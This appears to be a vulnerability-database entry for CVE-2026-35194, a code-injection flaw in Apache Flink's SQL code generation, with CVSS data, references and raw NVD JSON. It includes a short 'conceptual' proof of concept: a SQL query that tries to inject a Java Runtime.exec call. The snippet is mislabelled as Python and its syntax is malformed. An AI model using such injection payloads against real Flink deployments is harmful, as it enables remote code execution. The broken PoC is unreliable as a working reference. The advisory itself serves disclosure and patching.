CVE-2026-35194

Description

Code injection in SQL code generation in Apache Flink 1.15.0 through 1.20.x and 2.0.0 through 2.x allows authenticated users with query submission privileges to execute arbitrary code on TaskManagers via maliciously crafted SQL queries. The vulnerability affects JSON functions (1.15.0+) and LIKE expressions with ESCAPE clauses (1.17.0+). User-controlled strings are interpolated into generated Java code without proper escaping, allowing attackers to break out of string literals and inject arbitrary expressions. Users are recommended to upgrade to either version 1.20.4, 2.0.2, 2.1.2 or 2.2.1, which fixes this issue.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Apache Flink 1.15.0 - 1.20.x

Apache Flink 2.0.0 - 2.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- Conceptual PoC for CVE-2026-35194
-- Targeting JSON_VALUE code generation in Apache Flink

-- The vulnerability allows breaking out of string literals in the generated Java code.
-- An attacker can inject arbitrary Java expressions.

-- Example malicious SQL query:
SELECT JSON_VALUE(data, '$.key') FROM source_table
WHERE data = '{"key": "' + '}; /* Malicious Java Code Injection */ java.lang.Runtime.getRuntime().exec("calc"); // ' + ""}';

-- Note: The actual payload syntax depends on the specific code generation template
-- used by the affected Flink version for JSON functions or LIKE...ESCAPE clauses.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35194
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35194
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35194/
[4] VulDB https://vuldb.com/cve/CVE-2026-35194
[5] https://lists.apache.org/thread/qh52bw4hhvy7n2owd8b3bt51mz0lvj9x
[6] http://www.openwall.com/lists/oss-security/2026/05/15/20

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35194", "sourceIdentifier": "[email protected]", "published": "2026-05-15T16:16:14.340", "lastModified": "2026-05-15T22:16:51.900", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Code injection in SQL code generation in Apache Flink 1.15.0 through 1.20.x and 2.0.0 through 2.x allows authenticated users with query submission privileges to execute arbitrary code on TaskManagers via maliciously crafted SQL queries. The vulnerability affects JSON functions (1.15.0+) and LIKE expressions with ESCAPE clauses (1.17.0+). User-controlled strings are interpolated into generated Java code without proper escaping, allowing attackers to break out of string literals and inject arbitrary expressions.\n\nUsers are recommended to upgrade to either version 1.20.4, 2.0.2, 2.1.2 or 2.2.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://lists.apache.org/thread/qh52bw4hhvy7n2owd8b3bt51mz0lvj9x", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/15/20", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}